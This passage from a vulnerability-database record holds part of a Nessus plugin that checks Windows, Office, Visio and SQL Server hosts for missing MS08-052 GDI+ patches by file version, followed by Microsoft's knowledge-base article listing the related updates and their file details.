script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/09/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(english:\"This script is Copyright (C) 2008-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"mssql_version.nasl\", \"smb_nt_ms02-031.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, 'Host/patch_management_checks');\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS08-052';\nkbs = make_list(\"938464\", \"954326\", \"954478\", \"954479\", \"954606\");\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\npatched = 0;\n\nrootfile = hotfix_get_systemroot();\nif (!rootfile) exit(1, \"Failed to get the system root.\");\n\n\nshare = ereg_replace(pattern:\"^([A-Za-z]):.*\", replace:\"\\1$\", string:rootfile);\nlastshare = share;\naccessibleshare = FALSE;\npath = ereg_replace(pattern:\"^[A-Za-z]:(.*)\", replace:\"\\1\", string:rootfile);\n\nlogin\t= kb_smb_login();\npass \t= kb_smb_password();\ndomain \t= kb_smb_domain();\nport = kb_smb_transport();\n\nif(! smb_session_init()) audit(AUDIT_FN_FAIL, \"smb_session_init\");\n\nr = NetUseAdd(login:login, password:pass, domain:domain, share:share);\nif (r != 1)\n{\n NetUseDel();\n audit(AUDIT_SHARE_FAIL, share);\n}\n\naccessibleshare = TRUE;\npaths = make_list (\n \"\\WinSxS\\Policies\\x86_policy.1.0.Microsoft.Windows.GdiPlus_6595b64144ccf1df_x-ww_4e8510ac\",\n \"\\WinSxS\\Policies\\amd64_policy.1.0.Microsoft.Windows.GdiPlus_6595b64144ccf1df_x-ww_AE43B2CC\"\n );\n\nforeach spath (paths)\n{\n spath = path + spath;\n handle = CreateFile (file:spath, desired_access:GENERIC_READ, file_attributes:FILE_ATTRIBUTE_DIRECTORY, share_mode:FILE_SHARE_READ, create_disposition:OPEN_EXISTING);\n if ( ! isnull(handle) )\n {\n patched++;\n CloseFile(handle:handle);\n break;\n }\n}\n\nNetUseDel();\n\nvuln = 0;\noffice_versions = hotfix_check_office_version ();\nvisio_versions = get_kb_item(\"SMB/Office/Visio/*/VisioPath\");\n\ncdir = hotfix_get_commonfilesdir();\n\nif (is_accessible_share())\n{\n if (hotfix_check_sp(win2k:6, xp:4, win2003:3, vista:2) > 0)\n {\n kb = '938464';\n # Windows 2000, XP, 2003, Vista, 2008 and IE 6\n if ( !patched &&\n ( hotfix_is_vulnerable(os:\"6.0\", sp:0, file:\"Gdiplus.dll\", version:\"5.2.6000.16683\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:0, file:\"Gdiplus.dll\", version:\"5.2.6000.20826\", min_version:\"5.2.6000.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:0, file:\"Gdiplus.dll\", version:\"6.0.6000.16683\", min_version:\"6.0.6000.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:0, file:\"Gdiplus.dll\", version:\"6.0.6000.20826\", min_version:\"6.0.6000.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:1, file:\"Gdiplus.dll\", version:\"5.2.6001.18065\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:1, file:\"Gdiplus.dll\", version:\"5.2.6001.22170\", min_version:\"5.2.6001.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:1, file:\"Gdiplus.dll\", version:\"6.0.6001.18065\", min_version:\"6.0.6001.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:1, file:\"Gdiplus.dll\", version:\"6.0.6001.22170\", min_version:\"6.0.6001.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.2\", sp:1, file:\"Gdiplus.dll\", version:\"5.2.3790.3126\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Gdiplus.dll\", version:\"5.2.3790.4278\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.1\", sp:2, file:\"Gdiplus.dll\", version:\"5.1.3102.3352\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Gdiplus.dll\", version:\"5.1.3102.5581\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.0\", file:\"Gdiplus.dll\", version:\"5.1.3102.3352\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.0\", file:\"Vgx.dll\", version:\"6.0.2800.1612\", min_version:\"6.0.0.0\", dir:\"\\Microsoft Shared\\VGX\", path:cdir, bulletin:bulletin, kb:kb) )\n )\n {\n vuln++;\n }\n }\n}\n\n# Office 2003\nif (office_versions[\"11.0\"])\n{\n path = hotfix_get_officeprogramfilesdir(officever:\"11.0\") + \"\\Microsoft Office\\OFFICE11\";\n share = hotfix_path2share(path:path);\n if (share != lastshare || !accessibleshare)\n {\n lastshare = share;\n if (is_accessible_share(share:share)) accessibleshare = TRUE;\n }\n if (accessibleshare)\n {\n if ( hotfix_check_fversion(file:\"Gdiplus.dll\", version:\"11.0.8230.0\", path:path, bulletin:bulletin, kb:'954478') == HCF_OLDER )\n {\n vuln++;\n }\n }\n}\n\n# Office 2007\nif (office_versions[\"12.0\"])\n{\n path = hotfix_get_commonfilesdir() + \"\\Microsoft Shared\\OFFICE12\";\n share = hotfix_path2share(path:path);\n if (share != lastshare || !accessibleshare)\n {\n lastshare = share;\n if (is_accessible_share(share:share)) accesibleshare = TRUE;\n }\n if (accessibleshare)\n {\n if ( hotfix_check_fversion(file:\"Ogl.dll\", version:\"12.0.6325.5000\", path:path, bulletin:bulletin, kb:'954326') == HCF_OLDER )\n {\n vuln++;\n }\n }\n}\n\n# Visio 2002\nforeach visio_version (keys(visio_versions))\n{\n if (\"10.0\" >< visio_version)\n {\n path = hotfix_get_commonfilesdir() + \"\\Microsoft Shared\\OFFICE10\";\n share = hotfix_path2share(path:path);\n if (share != lastshare || !accessibleshare)\n {\n lastshare = share;\n if (is_accessible_share(share:share)) accessibleshare = TRUE;\n }\n if (accessibleshare)\n {\n if ( hotfix_check_fversion(file:\"Mso.dll\", version:\"10.0.6844.0\", path:path, bulletin:bulletin, kb:'954479') == HCF_OLDER )\n {\n vuln++;\n }\n }\n break;\n }\n}\n\n# SQL server 2005\nkb = '954606';\nif ( ( hotfix_check_fversion(path:rootfile, file:\"Sqlservr.exe\", version:\"2005.90.3073.0\", min_version:\"2005.90.3000.0\", bulletin:bulletin, kb:kb) == HCF_OLDER ) ||\n ( hotfix_check_fversion(path:rootfile, file:\"Sqlservr.exe\", version:\"2005.90.3282.0\", min_version:\"2005.90.3200.0\", bulletin:bulletin, kb:kb) == HCF_OLDER ) )\n{\n vuln++;\n}\n\nhotfix_check_fversion_end();\nif (vuln)\n{\n set_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_security_hole();\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, 'affected');\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "mskb": [{"lastseen": "2020-11-24T18:52:51", "bulletinFamily": "microsoft", "cvelist": ["CVE-2008-3013", "CVE-2008-3015", "CVE-2008-3014", "CVE-2008-3012", "CVE-2007-5348"], "description": "<html><body><p>Resolves several vulnerabilities in Microsoft Windows GDI+ that could allow remote code execution if a user viewed a specially crafted image file using affected software.</p><h2></h2><div class=\"kb-notice-section section\"><span class=\"text-base\">Support for Windows Vista Service Pack 1 (SP1) ends on July 12, 2011. To continue receiving security updates for Windows, make sure you're running Windows Vista with Service Pack 2 (SP2). For more information, refer to this Microsoft web page: <a href=\"http://windows.microsoft.com/en-us/windows/help/end-support-windows-xp-sp2-windows-vista-without-service-packs\" id=\"kb-link-1\" target=\"_self\">Support is ending for some versions of Windows</a></span>.</div><h2></h2><div class=\"kb-notice-section section\"><span class=\"text-base\">Support for Windows Vista Service Pack 1 (SP1) ends on July 12, 2011. To continue receiving security updates for Windows, make sure you're running Windows Vista with Service Pack 2 (SP2). For more information, refer to this Microsoft web page: <a href=\"http://windows.microsoft.com/en-us/windows/help/end-support-windows-xp-sp2-windows-vista-without-service-packs\" id=\"kb-link-2\" target=\"_self\">Support is ending for some versions of Windows</a></span>.</div><h2>INTRODUCTION</h2><div class=\"kb-summary-section section\">Microsoft has released security bulletin MS08-052. To view the complete security bulletin, visit one of the following Microsoft Web sites:<br/><br/><ul class=\"sbody-free_list\"><li>Home users:<br/><div class=\"indent\"><a href=\"http://www.microsoft.com/protect/computer/updates/bulletins/200809.mspx\" id=\"kb-link-3\" target=\"_self\">http://www.microsoft.com/protect/computer/updates/bulletins/200809.mspx</a></div><span class=\"text-base\">Skip the details</span>: Download the updates for your home computer or laptop from the Microsoft Update Web site now:<br/><div class=\"indent\"><a href=\"http://update.microsoft.com/microsoftupdate/\" id=\"kb-link-4\" target=\"_self\">http://update.microsoft.com/microsoftupdate/</a></div></li><li>IT professionals:<br/><div class=\"indent\"><a href=\"http://www.microsoft.com/technet/security/bulletin/ms08-052.mspx\" id=\"kb-link-5\" target=\"_self\">http://www.microsoft.com/technet/security/bulletin/MS08-052.msp</a></div></li></ul><span><h3 class=\"sbody-h3\">How to obtain help and support for this security update</h3> <br/>Help installing updates: <br/><a href=\"https://support.microsoft.com/ph/6527\" id=\"kb-link-6\" target=\"_self\">Support for Microsoft Update</a><br/><br/>Security solutions for IT professionals: <br/><a href=\"http://technet.microsoft.com/security/bb980617.aspx\" id=\"kb-link-7\" target=\"_self\">TechNet Security Troubleshooting and Support</a><br/><br/>Help protect your computer that is running Windows from viruses and malware:<br/><a href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" id=\"kb-link-8\" target=\"_self\">Virus Solution and Security Center</a><br/><br/>Local support according to your country: <br/><a href=\"https://support.microsoft.com/common/international.aspx\" id=\"kb-link-9\" target=\"_self\">International Support</a><br/><br/></span></div><h2></h2><div class=\"kb-moreinformation-section section\"><h3 class=\"sbody-h3\">Additional information about this security update</h3><span>For more information about this security update and for information about any known issues with specific releases of this software, click the following article number to view the article in the Microsoft Knowledge Base:<br/><br/><div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/938464\" id=\"kb-link-10\">938464 </a> MS08-052: Description of the security update for GDI+ for all editions of Windows XP, Windows Vista, Windows Server 2003, Windows Server 2008 and for Windows Server 2000 with Internet Explorer 6 Service Pack 1<br/><br/></div></span><span><div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/947736\" id=\"kb-link-11\">947736 </a> <br/>MS08-052: Description of the security update for GDI+ for Visual Studio .NET 2002 Service Pack 1: September 9, 2008<br/><br/></div></span><span><div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/947737\" id=\"kb-link-12\">947737 </a> <br/>MS08-052: Description of the security update for GDI+ for Visual Studio .NET 2003 Service Pack 1: September 9, 2008</div></span><span><div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/947738\" id=\"kb-link-13\">947738 </a>MS08-052: Description of the security update for GDI+ for Visual Studio 2005 Service Pack 1: September 9, 2008</div></span><span><div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/952241\" id=\"kb-link-14\">952241 </a>MS08-052: Description of the security update for GDI+ for Visual Studio 2008: September 9, 2008</div></span><span><div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/947739\" id=\"kb-link-15\">947739 </a>MS08-052: Description of the security update for GDI+ for the .NET Framework 1.0 Service Pack 3: September 9, 2008</div></span><span><div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/947742\" id=\"kb-link-16\">947742 </a>MS08-052: Description of the security update for GDI+ for the .NET Framework 1.1 Service Pack 1: September 9, 2008</div></span><span><div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/947746\" id=\"kb-link-17\">947746 </a>MS08-052: Description of the security update for GDI+ for the .NET Framework 2.0: September 9, 2008</div></span><span><div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/947748\" id=\"kb-link-18\">947748 </a>MS08-052: Description of the security update for GDI+ for the .NET Framework 2.0 Service Pack 1: September 9, 2008</div></span><span><div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/954326\" id=\"kb-link-19\">954326 </a>MS08-052: Description of the security update for GDI+ for the 2007 Office system: September 9, 2008</div></span><span><div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/954478\" id=\"kb-link-20\">954478 </a>MS08-052: Description of the security update for GDI+ for Office 2003: September 9, 2008</div></span><span><div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/954479\" id=\"kb-link-21\">954479 </a>MS08-052: Description of the security update for GDI+ for Visio 2002: September 9, 2008</div></span><span><div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/954606\" id=\"kb-link-22\">954606 </a>MS08-052: Description of the security update for GDI+ for SQL Server 2005 Service Pack 2 GDR: September 9, 2008</div></span><span><div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/954607\" id=\"kb-link-23\">954607 </a>MS08-052: Description of the security update for GDI+ for SQL Server 2005 Service Pack 2 Hotfix: September 9, 2008</div></span><span><div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/954609\" id=\"kb-link-24\">954609 </a>MS08-052: Description of the security update for GDI+ for SQL Server 2000 Reporting Services Service Pack 2: September 9, 2008</div></span><span><div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/954765\" id=\"kb-link-25\">954765 </a>MS08-052: Description of the security update for GDI+ for Microsoft Report Viewer Redistributable 2005 Service Pack 1: September 9, 2008</div></span><span><div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/954766\" id=\"kb-link-26\">954766 </a>MS08-052: Description of the security update for GDI+ for Microsoft Report Viewer Redistributable 2008: September 9, 2008</div></span><span><div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/955368\" id=\"kb-link-27\">955368 </a>MS08-052: Description of the security update for GDI+ for Visual FoxPro 8.0 Service Pack 1: September 9, 2008</div></span><span><div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/955369\" id=\"kb-link-28\">955369 </a>MS08-052: Description of the security update for GDI+ for Visual FoxPro 9.0 Service Pack 1: September 9, 2008</div></span><span><div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/955370\" id=\"kb-link-29\">955370 </a>MS08-052: Description of the security update for GDI+ for Visual FoxPro 9.0 Service Pack 2: September 9, 2008</div></span><span><div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/955992\" id=\"kb-link-30\">955992 </a>MS08-052: Description of the security update for GDI+ for Digital Image Suite 2006: September 9, 2008</div></span><span><div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/956483\" id=\"kb-link-31\">956483 </a>MS08-052: Description of the security update for GDI+ for Works 8: September 9, 2008</div></span><span><div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/956500\" id=\"kb-link-32\">956500 </a>MS08-052: Description of the security update for GDI+ for PowerPoint Viewer 2003: September 9, 2008</div></span><span><div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/957177\" id=\"kb-link-33\">957177 </a>MS08-052: Description of the security update for GDI+ for Forefront Client Security that is installed in Windows 2000: September 9, 2008</div></span><span><div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/953405\" id=\"kb-link-34\">953405 </a>MS08-052 and MS08-055: Description of the security update for Office XP: September 9, 2008<br/></div></span><h3 class=\"sbody-h3\">File information for Microsoft Visual Studio</h3><span>The English (United States) version of this security update has the file attributes (or later file attributes) that are listed in the following table. The dates and times for these files are listed in Coordinated Universal Time (UTC). When you view the file information, it is converted to local time. To find the difference between UTC and local time, use the <strong class=\"uiterm\">Time Zone</strong> tab in the <strong class=\"uiterm\">Date and Time</strong> item in Control Panel. </span><h4 class=\"sbody-h4\">For Visual Studio 2002 Service Pack 1</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File Name</th><th class=\"sbody-th\">Version</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Size</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Gdiplus.dll</td><td class=\"sbody-td\">5.1.3102.3352</td><td class=\"sbody-td\">15-Apr-2008</td><td class=\"sbody-td\">17:54</td><td class=\"sbody-td\">1,724,416</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Gdiplus.msm</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">13-Jun-2008</td><td class=\"sbody-td\">13:58</td><td class=\"sbody-td\">882,688</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mso.dll</td><td class=\"sbody-td\">10.0.6844.0</td><td class=\"sbody-td\">10-May-2008</td><td class=\"sbody-td\">23:22</td><td class=\"sbody-td\">9,819,136</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mso7ftp.exe</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">11-Jul-1997</td><td class=\"sbody-td\">08:37</td><td class=\"sbody-td\">3,072</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mso7ftpa.exe</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">11-Jul-1997</td><td class=\"sbody-td\">08:37</td><td class=\"sbody-td\">3,072</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mso7ftps.exe</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">11-Jul-1997</td><td class=\"sbody-td\">08:37</td><td class=\"sbody-td\">3,072</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msoicons.exe</td><td class=\"sbody-td\">1.0.0.1</td><td class=\"sbody-td\">26-Jul-2000</td><td class=\"sbody-td\">01:58</td><td class=\"sbody-td\">40,960</td></tr></table></div><h4 class=\"sbody-h4\">For Visual Studio 2003 Service Pack 1</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File Name</th><th class=\"sbody-th\">Version</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Size</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Gdiplus.dll</td><td class=\"sbody-td\">5.1.3102.3352</td><td class=\"sbody-td\">15-Apr-2008</td><td class=\"sbody-td\">17:54</td><td class=\"sbody-td\">1,724,416</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Gdiplus.msm</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">12-Jun-2008</td><td class=\"sbody-td\">20:38</td><td class=\"sbody-td\">883,712</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mso.dll</td><td class=\"sbody-td\">10.0.6844.0</td><td class=\"sbody-td\">10-May-2008</td><td class=\"sbody-td\">23:22</td><td class=\"sbody-td\">9,819,136</td></tr></table></div><h4 class=\"sbody-h4\">For Visual Studio 2005 Service Pack 1</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File Name</th><th class=\"sbody-th\">Version</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Size</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Microsoft.Reportviewer.Webforms.dll</td><td class=\"sbody-td\">8.0.50727.1843</td><td class=\"sbody-td\">04-Jul-2008</td><td class=\"sbody-td\">06:53</td><td class=\"sbody-td\">540,672</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Microsoft.Reportviewer.Webforms.dll</td><td class=\"sbody-td\">8.0.50727.1843</td><td class=\"sbody-td\">04-Jul-2008</td><td class=\"sbody-td\">06:53</td><td class=\"sbody-td\">540,672</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ReportViewerLP.exe</td><td class=\"sbody-td\">2.0.50727.1843</td><td class=\"sbody-td\">05-Jul-2008</td><td class=\"sbody-td\">14:14</td><td class=\"sbody-td\">520,200</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ReportViewerLP.exe</td><td class=\"sbody-td\">2.0.50727.1843</td><td class=\"sbody-td\">05-Jul-2008</td><td class=\"sbody-td\">14:16</td><td class=\"sbody-td\">520,712</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ReportViewerLP.exe</td><td class=\"sbody-td\">2.0.50727.1843</td><td class=\"sbody-td\">05-Jul-2008</td><td class=\"sbody-td\">19:43</td><td class=\"sbody-td\">534,024</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ReportViewerLP.exe</td><td class=\"sbody-td\">2.0.50727.1843</td><td class=\"sbody-td\">05-Jul-2008</td><td class=\"sbody-td\">19:46</td><td class=\"sbody-td\">530,440</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ReportViewerLP.exe</td><td class=\"sbody-td\">2.0.50727.1843</td><td class=\"sbody-td\">05-Jul-2008</td><td class=\"sbody-td\">19:48</td><td class=\"sbody-td\">531,464</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ReportViewerLP.exe</td><td class=\"sbody-td\">2.0.50727.1843</td><td class=\"sbody-td\">05-Jul-2008</td><td class=\"sbody-td\">19:50</td><td class=\"sbody-td\">530,440</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ReportViewerLP.exe</td><td class=\"sbody-td\">2.0.50727.1843</td><td class=\"sbody-td\">05-Jul-2008</td><td class=\"sbody-td\">07:53</td><td class=\"sbody-td\">525,320</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ReportViewerLP.exe</td><td class=\"sbody-td\">2.0.50727.1843</td><td class=\"sbody-td\">05-Jul-2008</td><td class=\"sbody-td\">14:19</td><td class=\"sbody-td\">523,272</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ReportViewerLP.exe</td><td class=\"sbody-td\">2.0.50727.1843</td><td class=\"sbody-td\">04-Jul-2008</td><td class=\"sbody-td\">08:14</td><td class=\"sbody-td\">1,929,224</td></tr></table></div><h4 class=\"sbody-h4\">For Visual Studio 2008</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File Name</th><th class=\"sbody-th\">Version</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Size</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Microsoft.Reportviewer.Webforms.dll</td><td class=\"sbody-td\">9.0.21022.143</td><td class=\"sbody-td\">21-Jul-2008</td><td class=\"sbody-td\">10:50</td><td class=\"sbody-td\">1,810,432</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Reportviewer.exe</td><td class=\"sbody-td\">9.0.21022.143</td><td class=\"sbody-td\">31-Jul-2008</td><td class=\"sbody-td\">00:28</td><td class=\"sbody-td\">3,008,064</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">RSClientPrint.cab</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">21-Jul-2008</td><td class=\"sbody-td\">14:15</td><td class=\"sbody-td\">1,184,828</td></tr></table></div><h3 class=\"sbody-h3\">File information for the Microsoft .NET Framework</h3><span>The English (United States) version of this security update has the file attributes (or later file attributes) that are listed in the following table. The dates and times for these files are listed in Coordinated Universal Time (UTC). When you view the file information, it is converted to local time. To find the difference between UTC and local time, use the <strong class=\"uiterm\">Time Zone</strong> tab in the <strong class=\"uiterm\">Date and Time</strong> item in Control Panel. </span><h4 class=\"sbody-h4\">For the .NET Framework 1.0 Service Pack 3</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File Name</th><th class=\"sbody-th\">Version</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Size</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Gdiplus.dll</td><td class=\"sbody-td\">5.1.3102.3352</td><td class=\"sbody-td\">15-Apr-2008</td><td class=\"sbody-td\">17:54</td><td class=\"sbody-td\">1,724,416</td></tr></table></div><h4 class=\"sbody-h4\">For the .NET Framework 1.1 Service Pack 1</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File Name</th><th class=\"sbody-th\">Version</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Size</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Gdiplus.dll</td><td class=\"sbody-td\">5.1.3102.3352</td><td class=\"sbody-td\">15-Apr-2008</td><td class=\"sbody-td\">17:54</td><td class=\"sbody-td\">1,724,416</td></tr></table></div><h4 class=\"sbody-h4\">For the .NET Framework 2.0</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File Name</th><th class=\"sbody-th\">Version</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Size</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Gdiplus.dll</td><td class=\"sbody-td\">5.1.3102.3352</td><td class=\"sbody-td\">15-May-2008</td><td class=\"sbody-td\">09:39</td><td class=\"sbody-td\">1,724,416</td></tr></table></div><h4 class=\"sbody-h4\">For the .NET Framework 2.0 Service Pack 1</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File Name</th><th class=\"sbody-th\">Version</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Size</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Gdiplus.dll</td><td class=\"sbody-td\">5.1.3102.3352</td><td class=\"sbody-td\">23-May-2008</td><td class=\"sbody-td\">11:19</td><td class=\"sbody-td\">1,724,416</td></tr></table></div><h3 class=\"sbody-h3\">File information for Microsoft Office</h3><span>The English (United States) version of this security update has the file attributes (or later file attributes) that are listed in the following table. The dates and times for these files are listed in Coordinated Universal Time (UTC). When you view the file information, it is converted to local time. To find the difference between UTC and local time, use the <strong class=\"uiterm\">Time Zone</strong> tab in the <strong class=\"uiterm\">Date and Time</strong> item in Control Panel. </span><h4 class=\"sbody-h4\">For the 2007 Office system</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ogl.dll</td><td class=\"sbody-td\">12.0.6325.5000</td><td class=\"sbody-td\">1,663,008</td><td class=\"sbody-td\">25-Jul-2008</td><td class=\"sbody-td\">03:16</td></tr></table></div><h4 class=\"sbody-h4\">For Office 2003</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">GDIPlus.dll</td><td class=\"sbody-td\">11.0.8230.0</td><td class=\"sbody-td\">1,693,184</td><td class=\"sbody-td\">26-Jul-2008</td><td class=\"sbody-td\">00:15</td></tr></table></div><h4 class=\"sbody-h4\">For Visio 2002</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mso.dll</td><td class=\"sbody-td\">10.0.6844.0</td><td class=\"sbody-td\">9,819,136</td><td class=\"sbody-td\">10-May-2008</td><td class=\"sbody-td\">23:22</td></tr></table></div><span class=\"text-base\">Note</span> For cumulative purposes, the following file is also included with this package. However, this file is not part of the Security Update for Visio 2002 (KB954479):<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">gdiplus.dll</td><td class=\"sbody-td\">5.1.3102.1360</td><td class=\"sbody-td\">1,638,400</td><td class=\"sbody-td\">02-Mar-2004</td><td class=\"sbody-td\">21:19</td><td class=\"sbody-td\">Not Applicable</td></tr></table></div><span>For more information about the source for the 